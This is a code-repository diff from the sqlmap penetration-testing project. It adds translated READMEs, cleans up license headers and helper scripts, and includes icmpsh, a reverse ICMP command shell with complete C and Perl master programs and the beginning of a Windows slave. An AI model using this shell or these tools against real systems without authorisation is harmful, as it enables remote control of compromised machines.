+* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos)
+* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-pt-BR.md

@@ -0,0 +1,54 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
+
+Imagens
+----
+
+![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki.
+
+Instalação
+----
+
+Você pode baixar o arquivo tar mais recente clicando [aqui]
+(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas.
+
+Como usar
+----
+
+Para obter uma lista das opções básicas faça:
+
+    python sqlmap.py -h
+
+Para obter a lista completa de opções faça:
+
+    python sqlmap.py -hh
+
+Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217).
+Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki
+* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demonstrações: [#1](http://www.youtube.com/user/inquisb/videos) e [#2](http://www.youtube.com/user/stamparm/videos)
+* Imagens: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-tr-TR.md

@@ -0,0 +1,56 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
+
+
+Ekran görüntüleri
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+
+İsterseniz özelliklerin tanıtımının yapıldığı [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) sayfasını ziyaret edebilirsiniz.
+
+
+Kurulum
+----
+
+[Buraya](https://github.com/sqlmapproject/sqlmap/tarball/master) tıklayarak en son sürüm tarball'ı veya [buraya](https://github.com/sqlmapproject/sqlmap/zipball/master) tıklayarak zipbal'ı indirebilirsiniz.
+
+Veya tercihen, [Git](https://github.com/sqlmapproject/sqlmap) reposunu klonlayarak indirebilirsiniz
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap [Python](http://www.python.org/download/) sitesinde bulunan **2.6.x** and **2.7.x** versiyonları ile bütün platformlarda çalışabilmektedir.
+
+Kullanım
+----
+
+
+Bütün basit seçeneklerin listesini gösterir
+
+    python sqlmap.py -h
+
+Bütün seçenekleri gösterir
+
+    python sqlmap.py -hh
+
+Program ile ilgili örnekleri [burada](https://gist.github.com/stamparm/5335217) bulabilirsiniz. Daha fazlası içinsqlmap'in bütün açıklamaları ile birlikte bütün özelliklerinin, örnekleri ile bulunduğu  [manuel sayfamıza](https://github.com/sqlmapproject/sqlmap/wiki) bakmanızı tavsiye ediyoruz
+
+Links
+----
+
+* Anasayfa: http://sqlmap.org
+* İndirme bağlantıları: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commitlerin RSS beslemeleri: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Hata takip etme sistemi: https://github.com/sqlmapproject/sqlmap/issues
+* Kullanıcı Manueli: https://github.com/sqlmapproject/sqlmap/wiki
+* Sıkça Sorulan Sorular(SSS): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Mail listesi: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* Mail RSS takibi: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* Mail listesi arşivi: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demolar: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Ekran görüntüleri: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

doc/translations/README-zh-CN.md

@@ -0,0 +1,52 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap 是一个开源的渗透测试工具，可以用来自动化的检测，利用SQL注入漏洞，获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项，包括获取数据库中存储的数据，访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
+
+演示截图
+----
+
+![截图](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+你可以访问 wiki上的 [截图](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) 查看各种用法的演示
+
+安装方法
+----
+
+你可以点击 [这里](https://github.com/sqlmapproject/sqlmap/tarball/master) 下载最新的 `tar` 打包的源代码 或者点击 [这里](https://github.com/sqlmapproject/sqlmap/zipball/master)下载最新的 `zip` 打包的源代码.
+
+推荐你从 [Git](https://github.com/sqlmapproject/sqlmap) 仓库获取最新的源代码:
+
+    git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap 可以运行在 [Python](http://www.python.org/download/)  **2.6.x**  和  **2.7.x** 版本的任何平台上
+
+使用方法
+----
+
+通过如下命令可以查看基本的用法及命令行参数:
+
+    python sqlmap.py -h
+
+通过如下的命令可以查看所有的用法及命令行参数:
+
+    python sqlmap.py -hh
+
+你可以从 [这里](https://gist.github.com/stamparm/5335217) 看到一个sqlmap 的使用样例。除此以外，你还可以查看 [使用手册](https://github.com/sqlmapproject/sqlmap/wiki)。获取sqlmap所有支持的特性、参数、命令行选项开关及说明的使用帮助。
+
+链接
+----
+
+* 项目主页: http://sqlmap.org
+* 源代码下载: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS 订阅: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* 使用手册: https://github.com/sqlmapproject/sqlmap/wiki
+* 常见问题 (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* 邮件讨论列表: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
+* 邮件列表 RSS 订阅: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
+* 邮件列表归档: http://news.gmane.org/gmane.comp.security.sqlmap
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* 教程: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* 截图: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

extra/__init__.py

@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 pass

extra/beep/__init__.py

@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+pass

extra/beep/beep.py

@@ -0,0 +1,96 @@
+#!/usr/bin/env python
+
+"""
+beep.py - Make a beep sound
+
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import subprocess
+import sys
+import wave
+
+BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
+
+def beep():
+    try:
+        if subprocess.mswindows:
+            _win_wav_play(BEEP_WAV_FILENAME)
+        elif sys.platform == "darwin":
+            _mac_beep()
+        elif sys.platform == "linux2":
+            _linux_wav_play(BEEP_WAV_FILENAME)
+        else:
+            _speaker_beep()
+    except:
+        _speaker_beep()
+
+def _speaker_beep():
+    sys.stdout.write('\a')  # doesn't work on modern Linux systems
+
+    try:
+        sys.stdout.flush()
+    except IOError:
+        pass
+
+def _mac_beep():
+    import Carbon.Snd
+    Carbon.Snd.SysBeep(1)
+
+def _win_wav_play(filename):
+    import winsound
+
+    winsound.PlaySound(filename, winsound.SND_FILENAME)
+
+def _linux_wav_play(filename):
+    for _ in ("aplay", "paplay", "play"):
+        if not os.system("%s '%s' 2>/dev/null" % (_, filename)):
+            return
+
+    import ctypes
+
+    PA_STREAM_PLAYBACK = 1
+    PA_SAMPLE_S16LE = 3
+    BUFFSIZE = 1024
+
+    class struct_pa_sample_spec(ctypes.Structure):
+        _fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
+
+    pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
+
+    wave_file = wave.open(filename, "rb")
+
+    pa_sample_spec = struct_pa_sample_spec()
+    pa_sample_spec.rate = wave_file.getframerate()
+    pa_sample_spec.channels = wave_file.getnchannels()
+    pa_sample_spec.format = PA_SAMPLE_S16LE
+
+    error = ctypes.c_int(0)
+
+    pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
+    if not pa_stream:
+        raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
+
+    while True:
+        latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
+        if latency == -1:
+            raise Exception("Getting latency failed")
+
+        buf = wave_file.readframes(BUFFSIZE)
+        if not buf:
+            break
+
+        if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
+            raise Exception("Could not play file")
+
+    wave_file.close()
+
+    if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
+        raise Exception("Could not simple drain")
+
+    pa.pa_simple_free(pa_stream)
+
+if __name__ == "__main__":
+    beep()

extra/cloak/__init__.py

@@ -1,25 +1,8 @@
 #!/usr/bin/env python
 
 """
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 pass

extra/cloak/cloak.py

@@ -2,27 +2,14 @@
 
 """
 cloak.py - Simple file encryption/compression utility
-Copyright (C) 2010  Miroslav Stampar, Bernardo Damele A. G.
-email(s): miroslav.stampar@gmail.com, bernardo.damele@gmail.com
 
-This library is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
-import bz2
 import os
 import sys
+import zlib
 
 from optparse import OptionError
 from optparse import OptionParser
@@ -37,16 +24,23 @@ def hideAscii(data):
 
     return retVal
 
-def cloak(inputFile):
-    f = open(inputFile, 'rb')
-    data = bz2.compress(f.read())
-    f.close()
+def cloak(inputFile=None, data=None):
+    if data is None:
+        with open(inputFile, "rb") as f:
+            data = f.read()
 
-    return hideAscii(data)
+    return hideAscii(zlib.compress(data))
 
-def decloak(inputFile):
-    f = open(inputFile, 'rb')
-    data = bz2.decompress(hideAscii(f.read()))
+def decloak(inputFile=None, data=None):
+    if data is None:
+        with open(inputFile, "rb") as f:
+            data = f.read()
+    try:
+        data = zlib.decompress(hideAscii(data))
+    except:
+        print 'ERROR: the provided input file \'%s\' does not contain valid cloaked content' % inputFile
+        sys.exit(1)
+    finally:
         f.close()
 
     return data
@@ -69,7 +63,7 @@ def main():
         parser.error(e)
 
     if not os.path.isfile(args.inputFile):
-        print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile
+        print 'ERROR: the provided input file \'%s\' is non existent' % args.inputFile
         sys.exit(1)
 
     if not args.decrypt:
@@ -83,11 +77,9 @@ def main():
         else:
             args.outputFile = args.inputFile[:-1]
 
-    fpOut      = open(args.outputFile, 'wb')
-    sys.stdout = fpOut
-    sys.stdout.write(data)
-    sys.stdout.close()
-
+    f = open(args.outputFile, 'wb')
+    f.write(data)
+    f.close()
 
 if __name__ == '__main__':
     main()

extra/dbgtool/__init__.py

@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+pass

extra/dbgtool/dbgtool.py

@@ -2,23 +2,9 @@
 
 """
 dbgtool.py - Portable executable to ASCII debug script converter
-Copyright (C) 2009-2010  Bernardo Damele A. G.
-web: http://bernardodamele.blogspot.com/
-email: bernardo.damele@gmail.com
 
-This library is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
 """
 
 import os
@@ -33,20 +19,20 @@ def convert(inputFile):
     fileSize = fileStat.st_size
 
     if fileSize > 65280:
-        print 'ERROR: the provided input file \'%s\' is too big for debug.exe' % inputFile
+        print "ERROR: the provided input file '%s' is too big for debug.exe" % inputFile
         sys.exit(1)
 
-    script     = 'n %s\r\nr cx\r\n' % os.path.basename(inputFile.replace('.', '_'))
-    script    += "%x\r\nf 0100 ffff 00\r\n" % fileSize
+    script = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
+    script += "%x\nf 0100 ffff 00\n" % fileSize
     scrString = ""
     counter = 256
     counter2 = 0
 
-    fp          = open(inputFile, 'rb')
+    fp = open(inputFile, "rb")
     fileContent = fp.read()
 
     for fileChar in fileContent:
-        unsignedFileChar = struct.unpack('B', fileChar)[0]
+        unsignedFileChar = struct.unpack("B", fileChar)[0]
 
         if unsignedFileChar != 0:
             counter2 += 1
@@ -56,49 +42,49 @@ def convert(inputFile):
             else:
                 scrString += " %02x" % unsignedFileChar
         elif scrString:
-            script   += "%s\r\n" % scrString
+            script += "%s\n" % scrString
             scrString = ""
             counter2 = 0
 
         counter += 1
 
         if counter2 == 20:
-            script    += "%s\r\n" % scrString
+            script += "%s\n" % scrString
             scrString = ""
             counter2 = 0
 
-    script += "w\r\nq\r\n"
+    script += "w\nq\n"
 
     return script
 
 def main(inputFile, outputFile):
     if not os.path.isfile(inputFile):
-        print 'ERROR: the provided input file \'%s\' is not a regular file' % inputFile
+        print "ERROR: the provided input file '%s' is not a regular file" % inputFile
         sys.exit(1)
 
     script = convert(inputFile)
 
     if outputFile:
-        fpOut      = open(outputFile, 'w')
+        fpOut = open(outputFile, "w")
         sys.stdout = fpOut
         sys.stdout.write(script)
         sys.stdout.close()
     else:
         print script
 
-if __name__ == '__main__':
-    usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
-    parser  = OptionParser(usage=usage, version='0.1')
+if __name__ == "__main__":
+    usage = "%s -i <input file> [-o <output file>]" % sys.argv[0]
+    parser = OptionParser(usage=usage, version="0.1")
 
     try:
-        parser.add_option('-i', dest='inputFile', help='Input binary file')
+        parser.add_option("-i", dest="inputFile", help="Input binary file")
 
-        parser.add_option('-o', dest='outputFile', help='Output debug.exe text file')
+        parser.add_option("-o", dest="outputFile", help="Output debug.exe text file")
 
         (args, _) = parser.parse_args()
 
         if not args.inputFile:
-            parser.error('Missing the input file, -h for help')
+            parser.error("Missing the input file, -h for help")
 
     except (OptionError, TypeError), e:
         parser.error(e)

extra/icmpsh/README.txt

@@ -0,0 +1,45 @@
+icmpsh - simple reverse ICMP shell
+
+icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible master in C or Perl.
+
+
+--- Running the Master ---
+
+The master is straight forward to use. There are no extra libraries required for the C version. 
+The Perl master however has the following dependencies:
+
+    * IO::Socket
+    * NetPacket::IP
+    * NetPacket::ICMP
+
+
+When running the master, don't forget to disable ICMP replies by the OS. For example:
+
+    sysctl -w net.ipv4.icmp_echo_ignore_all=1
+
+If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
+commands send from the master.
+
+
+--- Running the Slave ---
+
+The slave comes with a few command line options as outlined below:
+
+
+-t host            host ip address to send ping requests to. This option is mandatory!
+
+-r                 send a single test icmp request containing the string "Test1234" and then quit. 
+                   This is for testing the connection.
+
+-d milliseconds    delay between requests in milliseconds 
+
+-o milliseconds    timeout of responses in milliseconds. If a response has not received in time, 
+                   the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+                   The counter is set back to 0 if a response was received.
+
+-b num             limit of blanks (unanswered icmp requests before quitting
+
+-s bytes           maximal data buffer size in bytes
+
+
+In order to improve the speed, lower the delay (-d) between requests or increase the size (-s) of the data buffer.

extra/icmpsh/__init__.py

@@ -0,0 +1,22 @@
+#!/usr/bin/env python
+#
+#  icmpsh - simple icmp command shell (port of icmpsh-m.pl written in
+#  Perl by Nico Leidecker <nico@leidecker.info>)
+#
+#  Copyright (c) 2010, Bernardo Damele A. G. <bernardo.damele@gmail.com>
+#
+#
+#  This program is free software: you can redistribute it and/or modify
+#  it under the terms of the GNU General Public License as published by
+#  the Free Software Foundation, either version 3 of the License, or
+#  (at your option) any later version.
+#
+#  This program is distributed in the hope that it will be useful,
+#  but WITHOUT ANY WARRANTY; without even the implied warranty of
+#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#  GNU General Public License for more details.
+#
+#  You should have received a copy of the GNU General Public License
+#  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+pass

extra/icmpsh/icmpsh-m.c

@@ -0,0 +1,134 @@
+/*
+ *   icmpsh - simple icmp command shell
+ *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+ *   This program is free software: you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation, either version 3 of the License, or
+ *   (at your option) any later version.
+ *
+ *    This program is distributed in the hope that it will be useful,
+ *    but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *    GNU General Public License for more details.
+ *
+ *    You should have received a copy of the GNU General Public License
+ *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <netinet/in.h>
+#include <netinet/ip_icmp.h>
+#include <netinet/ip.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#define IN_BUF_SIZE   1024
+#define OUT_BUF_SIZE  64
+
+// calculate checksum
+unsigned short checksum(unsigned short *ptr, int nbytes)
+{
+    unsigned long sum;
+    unsigned short oddbyte, rs;
+
+    sum = 0;
+    while(nbytes > 1) {
+        sum += *ptr++;
+        nbytes -= 2;
+    }
+
+    if(nbytes == 1) {
+        oddbyte = 0;
+        *((unsigned char *) &oddbyte) = *(u_char *)ptr;
+        sum += oddbyte;
+    }
+
+    sum  = (sum >> 16) + (sum & 0xffff);
+    sum += (sum >> 16);
+    rs = ~sum;
+    return rs;
+}
+
+int main(int argc, char **argv)
+{
+    int sockfd;
+    int flags;
+    char in_buf[IN_BUF_SIZE];
+    char out_buf[OUT_BUF_SIZE];
+    unsigned int out_size;
+    int nbytes;
+    struct iphdr *ip;
+    struct icmphdr *icmp;
+    char *data;
+    struct sockaddr_in addr;
+
+
+    printf("icmpsh - master\n");
+    
+    // create raw ICMP socket
+    sockfd = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP);
+    if (sockfd == -1) {
+       perror("socket");
+       return -1;
+    }
+
+    // set stdin to non-blocking
+    flags = fcntl(0, F_GETFL, 0);
+    flags |= O_NONBLOCK;
+    fcntl(0, F_SETFL, flags);
+
+    printf("running...\n");
+    while(1) {
+
+        // read data from socket
+        memset(in_buf, 0x00, IN_BUF_SIZE);
+        nbytes = read(sockfd, in_buf, IN_BUF_SIZE - 1);
+        if (nbytes > 0) {
+            // get ip and icmp header and data part
+            ip = (struct iphdr *) in_buf;
+            if (nbytes > sizeof(struct iphdr)) {
+                nbytes -= sizeof(struct iphdr);
+                icmp = (struct icmphdr *) (ip + 1);
+                if (nbytes > sizeof(struct icmphdr)) {
+                    nbytes -= sizeof(struct icmphdr);
+                    data = (char *) (icmp + 1);
+                    data[nbytes] = '\0';
+                    printf("%s", data);
+                    fflush(stdout);
+                }
+                
+                // reuse headers
+                icmp->type = 0;
+                addr.sin_family = AF_INET;
+                addr.sin_addr.s_addr = ip->saddr;
+        
+                // read data from stdin
+                nbytes = read(0, out_buf, OUT_BUF_SIZE);
+                if (nbytes > -1) {
+                    memcpy((char *) (icmp + 1), out_buf, nbytes);
+                    out_size = nbytes;
+                } else {
+                    out_size = 0;
+                }
+
+                icmp->checksum = 0x00;
+                icmp->checksum = checksum((unsigned short *) icmp, sizeof(struct icmphdr) + out_size);
+
+                // send reply
+                nbytes = sendto(sockfd, icmp, sizeof(struct icmphdr) + out_size, 0, (struct sockaddr *) &addr, sizeof(addr));
+                if (nbytes == -1) {
+                    perror("sendto");
+                    return -1;
+                }        
+            }
+        }
+    }
+
+    return 0;
+}
+

extra/icmpsh/icmpsh-m.pl

@@ -0,0 +1,62 @@
+#!/usr/bin/env perl
+#
+#  icmpsh - simple icmp command shell
+#  Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+#  This program is free software: you can redistribute it and/or modify
+#  it under the terms of the GNU General Public License as published by
+#  the Free Software Foundation, either version 3 of the License, or
+#  (at your option) any later version.
+#
+#  This program is distributed in the hope that it will be useful,
+#  but WITHOUT ANY WARRANTY; without even the implied warranty of
+#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#  GNU General Public License for more details.
+#
+#  You should have received a copy of the GNU General Public License
+#  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+#
+
+
+
+use strict;
+use IO::Socket;
+use NetPacket::IP;
+use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
+use Net::RawIP;
+use Fcntl;
+
+print "icmpsh - master\n";
+
+# create raw socket
+my $sock = IO::Socket::INET->new(
+                Proto   => "ICMP",
+                Type    => SOCK_RAW,
+                Blocking => 1) or die "$!";
+
+# set stdin to non-blocking
+fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
+
+print "running...\n";
+
+my $input = '';
+while(1) {
+        if ($sock->recv(my $buffer, 4096, 0)) {
+                my $ip = NetPacket::IP->decode($buffer);
+                my $icmp = NetPacket::ICMP->decode($ip->{data});
+                if ($icmp->{type} == ICMP_ECHO) {
+                        # get identifier and sequencenumber
+                        my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
+
+                        # write data to stdout and read from stdin
+                        print $data;
+                        $input = <STDIN>;
+
+                        # compile and send response
+                        $icmp->{type} = ICMP_ECHOREPLY;
+                        $icmp->{data} = pack("SSa*", $ident, $seq, $input);
+                        my $raw = $icmp->encode();
+                        my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
+                        $sock->send($raw, 0, $addr) or die "$!\n";
+                }
+        }
+}

extra/icmpsh/icmpsh-s.c

@@ -0,0 +1,346 @@
+/*
+ *   icmpsh - simple icmp command shell
+ *   Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+ *   This program is free software: you can redistribute it and/or modify
+ *   it under the terms of the GNU General Public License as published by
+ *   the Free Software Foundation, either version 3 of the License, or
+ *   (at your option) any later version.
+ *
+ *    This program is distributed in the hope that it will be useful,
+ *    but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *    GNU General Public License for more details.
+ *
+ *    You should have received a copy of the GNU General Public License
+ *    along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <winsock2.h>
+#include <windows.h>
+#include <winsock2.h>
+#include <iphlpapi.h>
+
+#define ICMP_HEADERS_SIZE	(sizeof(ICMP_ECHO_REPLY) + 8)
+
+#define STATUS_OK					0
+#define STATUS_SINGLE				1
+#define STATUS_PROCESS_NOT_CREATED	2
+
+#define TRANSFER_SUCCESS			1
+#define TRANSFER_FAILURE			0
+
+#define DEFAULT_TIMEOUT			    3000
+#define DEFAULT_DELAY			    200
